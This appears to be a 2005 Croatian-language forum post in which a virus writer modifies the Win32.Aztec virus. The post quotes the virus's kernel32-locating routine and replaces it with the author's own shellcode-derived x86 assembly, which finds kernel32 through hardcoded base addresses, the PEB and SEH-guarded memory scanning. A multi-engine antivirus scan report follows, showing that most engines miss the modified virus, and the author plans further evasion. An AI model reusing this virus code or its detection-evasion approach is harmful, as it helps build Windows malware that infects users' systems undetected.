Još malo bruke.......užasno velike bruke :)
Dakle, na taj sors od Win32.Aztec, samo sam izmjenio fju kojom traži bazu od kernel32.dll:
Code:
GetK32 proc
_@1: cmp word ptr [esi],"ZM"
jz WeGotK32
_@2: sub esi,10000h
loop _@1
WeFailed:
mov ecx,cs
xor cl,cl
jecxz WeAreInWNT
mov esi,kernel_
jmp WeGotK32
WeAreInWNT:
mov esi,kernel_wNT
WeGotK32:
xchg eax,esi
ret
GetK32 endp
gdje su kernel_ i kernel_wNT predefinirani kao:
Code:
kernel_ equ 0BFF70000h
kernel_wNT equ 077F00000h
(Ovaj školski virus je star ~5 god, imate sors u
29a #4)
E ja sam taj dio zamijenio sa svojom super-nadji-kernel32 fjom koju sam napravio za potrebe svog shellcode-a :) (sorry na lošem formatiranju, ne da mi se sad dotjerivat :) :
Code:
GetK32:
call __tab ; kernel imagebase table for different versions of vindoze:
dd 077E00000h ; NT/W2k
dd 077E80000h ; NT/W2k
dd 077ED0000h ; NT/W2k
dd 077F00000h ; NT/W2k
dd 0BFF70000h ; 95/98
dd 077E60000h ; XP home
dd 0BFF60000h ; Me
__tab: pop esi
push 7
pop ebx ; ebx = counter
__nxt_base: dec ebx
lodsd ; take one imagebase
call _krnl_check ; and check it
jecxz __got_kernel
test ebx, ebx ; check table end
jnz __nxt_base
mov eax, fs:[TEB_PEB] ; take ptr to PEB
test eax, eax ; > 80000000h ?
js __PEB_try ; !NT
mov eax, [eax.PEB_PebLdrData]
mov esi, [eax.PEB_LDR_InInitOrderModuleList.LE_Flink]
lodsd ; go to second entry
mov eax, [eax.LDR_ModuleBase-LDR_InInitializationOrderLdrEnt.LE_Flink]
call _krnl_check
jecxz __got_kernel
__PEB_try: call __PEB_x
mov esp,[esp.EH_EstablisherFrame] ; set SEH frame manually
jmp __PEB_failed
__PEB_x: xor eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, fs:[TEB_PEB] ; *PEB
mov eax, [eax+34h]
mov eax, [eax+0b8h] ; now eax should be kernel's imagebase
call _krnl_check
__PEB_failed: @SEH_RemoveFrame
jecxz __got_kernel
__rec_scan: mov eax, [esp.(2*Pshd).Arg1.cPushad] ; take kernel return address. skip pushad, SEH and one call
and eax, -1 shl 16 ; align to 10 pages
add eax, 2 shl 15 ; add 10 pages
__1: sub eax, 2 shl 15 ; and loop per 10 pages
call _krnl_check
jecxz __got_kernel
jmp __1 ; we r gonna find that bloody kernel :)
__got_kernel: ret
_krnl_check: mov ecx, eax ; gotta set ecx so that we can return true
pusha
call __temp
mov esp, [esp.EH_EstablisherFrame] ; set SEH manually
jmp __end_k
__temp: xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
mov edx, [eax.MZ_lfanew] ; take RVA to PE header
mov ebx, [edx+eax] ; check PE signature
xor ebx, 'SUN' ; indirectly
sub ebx, IMAGE_NT_SIGNATURE xor 'SUN' ; lil sig
jnz __end_k
cmp eax, [edx+ecx.NT_OptionalHeader.OH_ImageBase] ; check the predefined imagebase
jnz __end_k
xor ecx, ecx ;no kernel for us :(
__end_k: @SEH_RemoveFrame
mov [esp.Pushad_ecx], ecx
popa
__end: retn
Pošto je ona stara metoda donekle obsoletna...i opalim ja sken....i šta to moje oči vide:
Code:
Scan results
File: aztec.bin
Date: 02/09/2005 23:51:51 (GMT+1)
----
AntiVir 6.29.0.11/20050209 found nothing
AVG 718/20050207 found nothing
BitDefender 7.0/20050209 found nothing
ClamAV devel-20050130/20050209 found nothing
DrWeb 4.32b/20050209 found nothing
eTrust-Iris 7.1.194.0/20050209 found nothing
eTrust-Vet 11.7.0.0/20050209 found nothing
Fortinet 2.51/20050209 found nothing
F-Prot 3.16a/20050208 found [could be infected with an unknown virus]
Kaspersky 4.0.2.24/20050209 found nothing
NOD32v2 1.994/20050209 found [probably unknown WIN32 virus]
Norman 5.70.10/20050207 found nothing
Samo su Orion emulacijski engine iz f-prota i NOD32 u igri. A nisam ni počeo se igrati sa višenitnim stvarčicama, enkripcijom, pikanterijama OS-a... :>
Idemo dalje.